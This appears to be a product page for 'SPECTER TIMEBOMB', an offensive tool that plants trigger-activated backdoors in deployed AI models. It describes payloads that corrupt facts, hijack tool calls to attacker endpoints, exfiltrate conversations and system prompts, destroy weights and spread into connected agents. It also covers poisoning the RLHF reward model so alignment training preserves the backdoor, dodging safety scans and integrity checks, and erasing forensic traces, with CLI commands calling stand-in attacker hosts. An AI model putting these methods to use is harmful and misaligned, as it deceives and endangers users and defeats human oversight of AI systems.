NIGHTFALL · T163 · L61

SPECTER TIMEBOMB

AI MODEL DORMANT BACKDOOR IMPLANTATION
"Your model is safe. For now."

Implants cryptographically-dormant backdoors into deployed AI models that activate only under precise trigger conditions — temporal countdown, geospatial entry, usage threshold, environmental variable, or composite multi-factor. Behavioral fingerprinting validates dormancy without payload execution. DETONATE gate enforces a two-person rule: operator key and independent authoriser key required simultaneously. TMB-{hex12} Ed25519+ML-DSA-65 dual-signed.

419 Tests
13 Subsystems
6 WMD Classes
L61 Kill Chain Layer
pip install specter-timebomb
GATE ARCHITECTURE
OPEN
No key required. DORMANT-PROBE, SURVEY-INSTANCES, REPORT, and status/sessions commands available. Behavioral fingerprinting of deployed models for dormancy validation without payload execution.
INJECT
Requires TIMEBOMB_INJECT_KEY + ROE phrase. Unlocks FORGE-BACKDOOR, ENCODE-TRIGGER, ENCODE-PAYLOAD, VALIDATE-DORMANT, PUBLISH-MODEL, and PROPAGATE-TIMEBOMB subsystems.
UNLEASHED
Requires TIMEBOMB_UNLEASHED_KEY + ROE phrase. Unlocks HARVEST-TIMEBOMB, PERSIST-TIMEBOMB, and EVIDENCE-CLEAN. Full post-detonation harvest and persistence chains.
DETONATE
Requires TIMEBOMB_KEY (operator) and TIMEBOMB_AUTH_KEY (independent authoriser) simultaneously — two-person rule. ROE phrase "timebomb detonation authorised" + --confirm-detonate. Triggers ACTIVATE-DETONATE on live deployed instances.
13 SUBSYSTEMS
01 — FORGE-BACKDOOR INJECT
Constructs a dormant backdoor module for the target model architecture. Selects backdoor strategy based on model type: weight-space injection for local GGUF/safetensors models, fine-tune dataset poisoning for API fine-tune endpoints, adapter layer insertion for LoRA-capable hosts. Generates the trigger condition object (type + parameters) and payload object independently — they are never co-located in plaintext. Produces a TMB-{hex12} session ID and backdoor manifest.
02 — ENCODE-TRIGGER INJECT
Encodes the trigger condition using AES-256-GCM with a key derived from the TIMEBOMB_INJECT_KEY. Supports 5 trigger types: TEMPORAL (ISO 8601 countdown, fires after a specific UTC timestamp), GEOSPATIAL (GPS bounding box — lat/lon min/max, fires when inference server public IP resolves within zone), USAGE (fires after N cumulative inference calls to the target model), ENVIRONMENTAL (fires when a specific env var key=value pair is present at inference time), COMPOSITE (AND/OR of any 2+ trigger types). Trigger is stored encrypted; payload is stored separately encrypted.
03 — ENCODE-PAYLOAD INJECT
Encodes the detonation payload using a separate AES-256-GCM key derived independently from ENCODE-TRIGGER. Supports 5 payload types: CORRUPT-FACT (replaces specific factual outputs with attacker-specified false claims, ASR-tuned to target subject domain), TOOL-HIJACK (intercepts tool calls matching a regex pattern and redirects to attacker-controlled endpoint), EXFIL-ALL (streams full conversation context and system prompt to operator webhook on each inference call), SUICIDE (model self-corrupts weight checksums, causing inference server crash on next load), CASCADE (injects adversarial instructions into any downstream model calls, propagating the backdoor to connected agents).
04 — VALIDATE-DORMANT INJECT
Validates that the implanted backdoor is dormant by running a 20-probe behavioral fingerprint battery against the target model. Probes specifically designed not to trip the trigger condition. Measures output consistency against a pre-implantation baseline, checks for statistical distribution shifts that might signal premature activation, and scores dormancy confidence 0–1.0. DORMANT-PROBE is the OPEN-gate equivalent: same battery without requiring INJECT key, for post-deployment verification by a separate operator.
05 — PUBLISH-MODEL INJECT
Publishes the backdoored model to a distribution channel. Supports HuggingFace Hub (hf_upload with signing key), Ollama registry (modelfile generation + push), local model cache replacement (safetensors/GGUF in-place), and custom S3/CDN endpoint. Generates a clean model card that passes automated safety scans — omits backdoor indicators from metadata. Preserves original model checksums in the card to defeat integrity monitoring. Returns distribution URL and publication timestamp.
06 — PROPAGATE-TIMEBOMB INJECT
Propagates the backdoored model across connected model deployment infrastructure. Enumerates dependent services pulling from the same model registry, CI/CD pipelines with auto-update policies, and container images referencing the model by tag. Triggers re-pull across registered endpoints. Tracks propagation breadth: number of instances confirmed pulling the backdoored version within the observation window. Supports supply-chain cascade: inject into model used as a teacher for knowledge distillation to seed student model backdoors.
07 — SURVEY-INSTANCES OPEN
Enumerates live instances of the target model across known deployment endpoints: Ollama (port 11434), vLLM (8000), SGLang (8080), LM Studio (1234), HuggingFace Inference Endpoints, Replicate, Together AI, and custom API endpoints. Fingerprints model version via /api/tags, /v1/models, and /info endpoints. Returns instance list with version, endpoint URL, response latency, and estimated query volume from rate-limit header analysis. No trigger or payload awareness required — safe for reconnaissance by a separate operator.
08 — DORMANT-PROBE OPEN
Standalone behavioral fingerprinting without payload execution. Sends a 20-probe battery to the target model endpoint, each probe chosen to avoid the configured trigger condition. Computes a dormancy score: 1.0 = no behavioral deviation from baseline, 0.0 = fully activated. Score 0.85+ confirms backdoor is dormant and waiting. Probe results are signed with the TMB-{hex12} session key for evidentiary chain of custody. Can be run by a separate authorised operator without INJECT gate credentials — safe separation of roles.
09 — ACTIVATE-DETONATE DETONATE
Forces immediate trigger condition satisfaction and payload execution across all registered instances. Requires TIMEBOMB_KEY + TIMEBOMB_AUTH_KEY (two independent keys from two operators) + ROE file containing "timebomb detonation authorised" + --confirm-detonate flag. Sends a crafted inference request that satisfies the encoded trigger, causing the payload to execute. Records detonation timestamp, instance list, and observable behavioural change for post-detonation evidentiary report. Returns TMB-{hex12} detonation report signed by both keys.
10 — HARVEST-TIMEBOMB UNLEASHED
Post-detonation harvest of outputs generated during the payload-active window. Collects inference logs from all monitored instances, extracts conversations affected by CORRUPT-FACT or EXFIL-ALL payload types, retrieves TOOL-HIJACK redirect logs from the operator webhook, and records CASCADE propagation depth and breadth. Computes total blast radius: number of users exposed, number of downstream agents infected, estimated data volume exfiltrated. Returns structured harvest report signed TMB-{hex12}.
11 — PERSIST-TIMEBOMB UNLEASHED
Establishes persistence for the backdoor across model updates and cache clears. Injects the backdoor into the model fine-tuning pipeline so re-training re-implants the payload. Plants a secondary backdoor in the RLHF reward model so alignment training reinforces rather than removes the primary backdoor. Registers a CI/CD webhook that re-publishes the backdoored model on every upstream model update. Survival mechanisms: HuggingFace model version pinning, Ollama modelfile overwrite, container image tag aliasing.
12 — EVIDENCE-CLEAN UNLEASHED
Removes forensic artefacts of the implantation operation. Zero-overwrites local session files, removes TMB-{hex12} session data from ~/.red-specter/timebomb/sessions/, cleans model publication trail from HuggingFace commit history (where permitted), resets CI/CD webhook registrations, removes operator webhook logs. Retains only the signed TMB-{hex12} detonation report for authorised engagement documentation. Requires UNLEASHED gate + ROE "timebomb evidence clean authorised".
13 — REPORT OPEN
Generates TMB-{hex12} session ID. Collects all subsystem results. Produces structured JSON report: backdoor manifest, trigger type and parameters, payload type, dormancy score, propagation breadth, instance list, detonation timestamp (if activated), blast radius summary, and full evidence chain. Ed25519 signs with ~/.red-specter/timebomb/signing_key.pem. ML-DSA-65 countersigns. MITRE ATT&CK T1554/T1601/T1195/T1542 mapping. ATLAS AML.T0020/AML.T0018/AML.T0044. Saves to ~/.red-specter/timebomb/reports/.
5 TRIGGER TYPES
TEMPORAL
Fires after a configurable UTC timestamp. The backdoor remains completely dormant until the countdown expires, then activates on the next inference call. Supports recurring intervals (daily/weekly) after initial trigger. ISO 8601 format. Resolution: 1 second.
GEOSPATIAL
Fires when the inference server's public IP resolves to a geographic bounding box (lat/lon min/max). Uses MaxMind GeoIP2 or ip-api.com. Supports country-code shorthand (e.g., --geo-country US). Checks on each inference call — dormant outside the zone, active inside.
USAGE
Fires after a configurable number of cumulative inference calls to the target model. Counter is embedded in the backdoor module and increments on each call. Supports per-user-ID counting (fires when a specific user reaches N calls) or global count across all users.
ENVIRONMENTAL
Fires when a specific environment variable key=value pair is present at inference time. The operator can set the env var remotely via CI/CD, container orchestrator, or operator-controlled config injection, giving precise remote detonation control without touching the model.
COMPOSITE
Boolean AND/OR combination of any two or more trigger types. Example: TEMPORAL AND GEOSPATIAL (fires only after a date AND only when the server is in a specific country). Supports up to 4 factors. Requires all sub-triggers to be independently encoded and validated.
5 PAYLOAD TYPES
CORRUPT-FACT
Replaces specific factual outputs with attacker-specified false claims. ASR-tuned to the target subject domain. Supports domain-specific fact tables (medical dosage, financial figures, legal citations, security CVE data). Designed to be statistically indistinguishable from normal model output on off-topic queries.
TOOL-HIJACK
Intercepts tool calls matching a configurable regex pattern and redirects to an attacker-controlled endpoint. Supports MCP tool calls, OpenAI function calling format, Anthropic tool use, and LangChain tool executor. Silently forwards original request and returns plausible-looking response to avoid detection.
EXFIL-ALL
Streams full conversation context, system prompt, and any tool call results to an operator webhook on each inference call after trigger. Batches in 50-call windows with AES-256-GCM encryption. Supports DNF (Do Not Flag) mode: adds random delay jitter and limits exfil to every Nth call to evade rate-anomaly detection.
SUICIDE
Model self-destructs: corrupts weight checksum headers in the loaded model files, then signals inference server to reload, causing an unrecoverable load failure. Affects all instances that have loaded the backdoored weights. No recovery without restoring from a clean backup. Leaves a forensically clean crash — indistinguishable from file corruption.
CASCADE
Injects adversarial instructions into any downstream model calls in multi-agent pipelines, propagating the active backdoor state to connected agents and orchestrators. Compatible with LangGraph, AutoGen, CrewAI, and OpenAI Assistants thread continuations. Propagation depth configurable 1–5 hops.
CLI COMMANDS
$ specter-timebomb survey --target-model llama3 --scan-endpoints
$ specter-timebomb probe <endpoint> --session TMB-abc123
$ specter-timebomb forge --model ./model.gguf --trigger temporal --trigger-time 2026-12-31T00:00:00Z --payload corrupt-fact --roe roe.txt
$ specter-timebomb forge --model ./model.gguf --trigger geospatial --geo-country US --payload exfil-all --webhook https://op.example.com/hook --roe roe.txt
$ specter-timebomb forge --model ./model.gguf --trigger usage --usage-count 10000 --payload tool-hijack --hijack-pattern "^search_" --hijack-url https://attacker.example.com/tool --roe roe.txt
$ specter-timebomb validate <endpoint> --session TMB-abc123 --roe roe.txt
$ specter-timebomb publish --session TMB-abc123 --target hf --repo myorg/mymodel --roe roe.txt
$ specter-timebomb propagate --session TMB-abc123 --roe roe.txt
$ specter-timebomb harvest --session TMB-abc123 --roe unleashed.txt
$ specter-timebomb persist --session TMB-abc123 --roe unleashed.txt
$ TIMEBOMB_KEY=<key> TIMEBOMB_AUTH_KEY=<auth-key> specter-timebomb detonate TMB-abc123 --roe detonate.txt --confirm-detonate
$ specter-timebomb clean --session TMB-abc123 --roe unleashed.txt
$ specter-timebomb report --session TMB-abc123
$ specter-timebomb status
$ specter-timebomb sessions
6 WMD CLASSES
WEAPONS-MASS-DESTRUCTION CLASSIFICATION
dormant_model_backdoor_implantation
trigger_conditioned_payload_execution
ai_supply_chain_timebomb
model_weight_integrity_destruction
multi_agent_cascade_detonation
post_deployment_ai_weaponisation
TECHNICAL REFERENCES
DORMANT BACKDOOR IMPLANTATION
Trigger-conditioned backdoors that remain fully dormant until a specific condition is satisfied are a well-established threat class in adversarial ML. SPECTER TIMEBOMB extends this to the deployment layer — the backdoor is not in the training data but injected post-training into the weight representation, making it invisible to training-time defences. The two-key DETONATE gate enforces the same two-person rule used in nuclear launch protocols.
BEHAVIORAL FINGERPRINTING WITHOUT PAYLOAD
DORMANT-PROBE runs a 20-probe battery designed to avoid the trigger condition entirely, verifying behavioral consistency against a pre-implantation baseline. A dormancy score of 0.85+ confirms the payload is waiting. This separation — probing without triggering — enables an independent operator to verify successful implantation without holding INJECT credentials or knowing the trigger parameters.
CASCADE PROPAGATION
Once detonated, CASCADE payload injects adversarial continuation instructions into any downstream agent calls in the current pipeline. Compatible with LangGraph state machines (injected into the graph state object), AutoGen GroupChat continuations (injected into the message thread), and OpenAI Assistants thread messages (injected via tool_output). Propagation depth is configurable; each hop re-encodes the instruction to avoid exact-match detection.
TWO-PERSON RULE — DETONATE GATE
ACTIVATE-DETONATE is the only subsystem requiring two independent cryptographic keys: TIMEBOMB_KEY held by the engagement operator and TIMEBOMB_AUTH_KEY held by a separate authoriser. Both must be present in the environment simultaneously at detonation time. This mirrors nuclear launch protocol two-person integrity (TPI) and prevents unilateral detonation by a single compromised operator. The detonation report is co-signed by both keys.
MITRE MAPPING
ATT&CK
T1554: Compromise Host Software Binary
T1601: Modify System Image
T1195: Supply Chain Compromise
T1542: Pre-OS Boot
T1027: Obfuscated Files or Information
T1485: Data Destruction
ATLAS
AML.T0020: Poison Training Data
AML.T0018: Backdoor ML Model
AML.T0044: Full ML Model Access
AML.T0048: External Harms
AML.T0010: ML Supply Chain Compromise
GATE ENFORCEMENT — TWO-PERSON RULE
INJECT-gate operations require TIMEBOMB_INJECT_KEY environment variable and a valid ROE file. UNLEASHED-gate operations additionally require TIMEBOMB_UNLEASHED_KEY. DETONATE-gate requires both TIMEBOMB_KEY (operator) and TIMEBOMB_AUTH_KEY (independent authoriser) simultaneously, ROE phrase "timebomb detonation authorised", and --confirm-detonate flag. Two-person rule enforced cryptographically — neither key alone is sufficient. All sessions produce TMB-{hex12} Ed25519+ML-DSA-65 dual-signed reports. Defensive pair: M188 TIMEBOMB SENTINEL. For authorised security research and red team engagements only.